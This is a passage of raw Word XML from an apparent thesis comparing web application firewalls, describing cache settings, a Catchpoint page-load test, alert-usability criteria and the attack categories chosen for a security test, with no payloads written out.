        <w:t>14</w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Disabling cache on Imperva</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w14:paraId="51443627" w14:textId="7EBCF505" w:rsidR="00C26C85" w:rsidRDefault="00C26C85" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">It was </w:t>
      </w:r>
      <w:r w:rsidR="00C22884">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">not </w:t>
      </w:r>
      <w:r w:rsidR="003E3878">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>straightforward for Cloudflare as they did not have the option to turn off caching. Instead, this was achieved by putting in place a rule to bypass cache for all pages</w:t>
      </w:r>
      <w:r w:rsidR="00E56A10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Figure 15)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DE540E" w14:textId="39B3E6BF" w:rsidR="00C26C85" w:rsidRDefault="00C26C85" w:rsidP="003E3878">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C4B676B" wp14:editId="63CB2E8A">
            <wp:extent cx="5731510" cy="6089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08965"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A80175" w14:textId="6176BD4B" w:rsidR="00C22884" w:rsidRDefault="003E3878" w:rsidP="003E3878">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Toc71138533"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00755101">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00AB2ACE">
        <w:t xml:space="preserve"> - Disabling cache on </w:t>
      </w:r>
      <w:r>
        <w:t>Cloudflare</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p w14:paraId="24D0C479" w14:textId="363CC7A3" w:rsidR="00A22147" w:rsidRDefault="0066618B" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The page load test </w:t>
      </w:r>
      <w:r w:rsidR="00021D72">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">would be </w:t>
      </w:r>
      <w:r w:rsidR="00BB03D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">measured by measuring the webpage response time, also known as the </w:t>
      </w:r>
      <w:r w:rsidR="00965A8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">total </w:t>
      </w:r>
      <w:r w:rsidR="00BB03D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>amount of time taken to fully load the index page</w:t>
      </w:r>
      <w:r w:rsidR="009D6836">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>. On Catchpoint, the type of test chosen of test chosen was web</w:t>
      </w:r>
      <w:r w:rsidR="00021D72">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009D6836">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>and the browser chosen was</w:t>
      </w:r>
      <w:r w:rsidR="00021D72">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Google Chrome</w:t>
      </w:r>
      <w:r w:rsidR="00BB03D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>’s desktop version 85 release (85.0.4183.83.2).</w:t>
      </w:r>
      <w:r w:rsidR="00610514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> A GET request would be sent out to each domain’s index page, for example, http://cloudsecurity.gq/index.html</w:t>
      </w:r>
      <w:r w:rsidR="00AA62E4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>. The HTTP headers would be captured to ensure that the content was returned from the web server and not from cache</w:t>
      </w:r>
      <w:r w:rsidR="00F02EC6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> by checking for any cache headers.</w:t>
      </w:r>
      <w:r w:rsidR="00307781">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The test would be carried out </w:t>
      </w:r>
      <w:r w:rsidR="00FB766C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>from five cities across the globe – Cape Town, South Africa, Moscow, Russia, Singapore, Singapore, Sydney, Australia and Washington DC, United States of America.</w:t>
      </w:r>
      <w:r w:rsidR="00DE4084">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A22147">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>This entire process would be carried out by using Catchpoint</w:t>
      </w:r>
      <w:r w:rsidR="0038139E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> as can be seen in Figure </w:t>
      </w:r>
      <w:r w:rsidR="00521C89">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r w:rsidR="00A22147">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB3ED05" w14:textId="3A1D24C9" w:rsidR="0038139E" w:rsidRDefault="0026475A" w:rsidP="003E3878">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31C5B471" wp14:editId="73CF8B59">
            <wp:extent cx="5731510" cy="24034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03475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B18FF3A" w14:textId="629F8F27" w:rsidR="003E3878" w:rsidRDefault="003E3878" w:rsidP="003E3878">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc71138534"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00755101">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Load test settings on Catchpoint</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w14:paraId="3AF981B7" w14:textId="4C61A813" w:rsidR="00BB16D8" w:rsidRDefault="00DE4084" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Ten requests would be sent for each domain from each source client, which totals to 50 requests made to each domain. The average duration from each city and the average overall duration per domain would be calculated and presented in the results section</w:t>
      </w:r>
      <w:r w:rsidR="00E93AC5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F88DE39" w14:textId="6A714947" w:rsidR="003F7208" w:rsidRPr="00C34B1F" w:rsidRDefault="00B679C6" w:rsidP="00B679C6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc71138496"/>
      <w:r>
        <w:t xml:space="preserve">3.4.4 </w:t>
      </w:r>
      <w:r w:rsidR="003F7208" w:rsidRPr="00C34B1F">
        <w:t>WAF Alerts/Usability</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p w14:paraId="52DE6335" w14:textId="1F1DAC09" w:rsidR="003F7208" w:rsidRDefault="00EC2780" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">The next comparison that would be done would be on how accessible and informative each WAF’s alerts were. </w:t>
      </w:r>
      <w:r w:rsidR="00C03FC9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The comparison would be quantitative</w:t>
      </w:r>
      <w:r w:rsidR="00C50296">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and measured</w:t>
      </w:r>
      <w:r w:rsidR="005B6F4B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> based on metrics set</w:t>
      </w:r>
      <w:r w:rsidR="00C03FC9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="005B6F4B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Qualitative observations would be recorded but not measured.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505D9389" w14:textId="7600B119" w:rsidR="009E4A10" w:rsidRDefault="009E4A10" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The quantitative metrics </w:t>
      </w:r>
      <w:r w:rsidR="00650386">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>contained 10 variables for comparison</w:t>
      </w:r>
      <w:r w:rsidR="000B4085">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> – informative error page, availability of alerts/security logs, portal access, email notification, alerts show useful information, rule details, quick whitelist option, alerts’ filter options, ability to export alerts or produce report and ability to view all historic alerts</w:t>
      </w:r>
      <w:r w:rsidR="00650386">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>. The response to each variable would be a Boolean response; true or false.</w:t>
      </w:r>
      <w:r w:rsidR="007106FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> We will now take a look at what each of the 10 variables </w:t>
      </w:r>
      <w:r w:rsidR="000B4085">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>entails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A82368A" w14:textId="02510DD4" w:rsidR="000B4085" w:rsidRDefault="003141B6" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Informative error page refers to whether the error page displayed to the user when a request is blocked contains information that would be useful to the user, such as a reference ID for the user to refer to the logs.</w:t>
      </w:r>
      <w:r w:rsidR="00477481">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Availability of alerts or security logs refer to whether the WAF provides alerts or security logs readily available for the user to access.</w:t>
      </w:r>
      <w:r w:rsidR="00A3777D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Portal access refers to the availability of a portal to manage the WAF or view its alerts and logs. Email notification refers to the availability of the option for the user to receive email notification with regards to security alerts. Another variable </w:t>
      </w:r>
      <w:r w:rsidR="007D0EFF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>checks</w:t>
      </w:r>
      <w:r w:rsidR="00A3777D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> whether each of the WAF’s alert </w:t>
      </w:r>
      <w:r w:rsidR="007D0EFF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>provides useful information such as the string from the request that triggered the rule and other information that would be able to assist with investigation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8C1FA8" w14:textId="7E80C84C" w:rsidR="0099631F" w:rsidRDefault="0099631F" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Rule details refer to the specific rule that was triggered by the request.</w:t>
      </w:r>
      <w:r w:rsidR="00EB12FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Quick whitelist option refers to an option made available to add a whitelist rule from the alert</w:t>
      </w:r>
      <w:r w:rsidR="00AB18D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (typically, whitelist rules have to be cr</w:t>
      </w:r>
      <w:r w:rsidR="004E6326">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ea</w:t>
      </w:r>
      <w:r w:rsidR="00AB18D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ted manually).</w:t>
      </w:r>
      <w:r w:rsidR="00CF6151">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F2041F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Filter options refer to the ability to filter through the alerts by various parameters such as reference ID, attack vector, URL or others.</w:t>
      </w:r>
      <w:r w:rsidR="00971326">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Export or produce report refers to the option for the user to export the alerts out in a certain file format such as csv or the option for the user to generate a report for the alerts. View all historic alerts refer to the availability of all alerts with no limitations such as duration of past 90 days data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9113D5" w14:textId="3520195F" w:rsidR="00D045E7" w:rsidRDefault="00D045E7" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The results of the comparison would be displayed in a table and analysed in the results section.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9C05C3" w14:textId="4E465898" w:rsidR="00C03B46" w:rsidRPr="00C34B1F" w:rsidRDefault="00B407E3" w:rsidP="00B407E3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_Toc71138497"/>
      <w:r>
        <w:t xml:space="preserve">3.4.5 </w:t>
      </w:r>
      <w:r w:rsidR="00C03B46" w:rsidRPr="00C34B1F">
        <w:t>Security</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p w14:paraId="3A33821B" w14:textId="028ECAC2" w:rsidR="00C03B46" w:rsidRPr="003F7208" w:rsidRDefault="00E37923" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">The final test category for this thesis would be the security test of the WAFs. </w:t>
      </w:r>
      <w:r w:rsidR="00E11F90">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>In this test, we would observe the behaviour of the respective WAFs when various attack vectors’ requests were sent to the WAF.</w:t>
      </w:r>
      <w:r w:rsidR="00957BC5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> After the behaviour was observed, we would analyse a sample of the </w:t>
      </w:r>
      <w:r w:rsidR="00957BC5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>blocked requests on how they were detected and blocked by each WAF</w:t>
      </w:r>
      <w:r w:rsidR="004F51B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, specifically, the string that triggered the rule</w:t>
      </w:r>
      <w:r w:rsidR="00957BC5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004F51B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> If details of the rule </w:t>
      </w:r>
      <w:r w:rsidR="00842EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>were</w:t>
      </w:r>
      <w:r w:rsidR="004F51B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> made available, it would also be taken note of</w:t>
      </w:r>
      <w:r w:rsidR="00200D82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> as observation</w:t>
      </w:r>
      <w:r w:rsidR="00990FBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B95D3B9" w14:textId="318AD189" w:rsidR="003F7208" w:rsidRPr="00F67F77" w:rsidRDefault="00D07633" w:rsidP="00D07633">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.4.5.1 </w:t>
      </w:r>
      <w:r w:rsidR="003F7208" w:rsidRPr="00F67F77">
        <w:t>Attack Vectors &amp; Payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47486ECE" w14:textId="1E51A666" w:rsidR="00BD77FD" w:rsidRDefault="0068594F" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">In this thesis, the attack vectors that would be used to test the WAFs would be </w:t>
      </w:r>
      <w:r w:rsidR="006218D3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>SQL injection, HTML injection, OS command injection (Linux OS commands), PHP code injection</w:t>
      </w:r>
      <w:r w:rsidR="00283983">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> broken authentication through dictionary attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D696C53" w14:textId="4AB6FC0D" w:rsidR="00D143FA" w:rsidRDefault="00EF2B18" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Payloads for each attack vector were gathered from public, internet resources such as Github. XSS payloads were mostly </w:t>
      </w:r>
      <w:r w:rsidR="00BC2B04">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>taken from Miessler’s (2020) Github page</w:t>
      </w:r>
      <w:r w:rsidR="00AE3BE8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, with some manual attempts, totalling to 124 payloads</w:t>
      </w:r>
      <w:r w:rsidR="00BC2B04">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="007A183C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B35CE5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">The SQL injection payloads were </w:t>
      </w:r>
      <w:r w:rsidR="00A6745C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>mostly extracted</w:t>
      </w:r>
      <w:r w:rsidR="00B35CE5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:r w:rsidR="00A6745C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Tasdelen’s (2020) Github page.</w:t>
      </w:r>
      <w:r w:rsidR="00F214AA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The 116 payloads for HTML injection consisted of a list of all HTML tags available.</w:t>
      </w:r>
      <w:r w:rsidR="002666DA">
        <w:rPr>
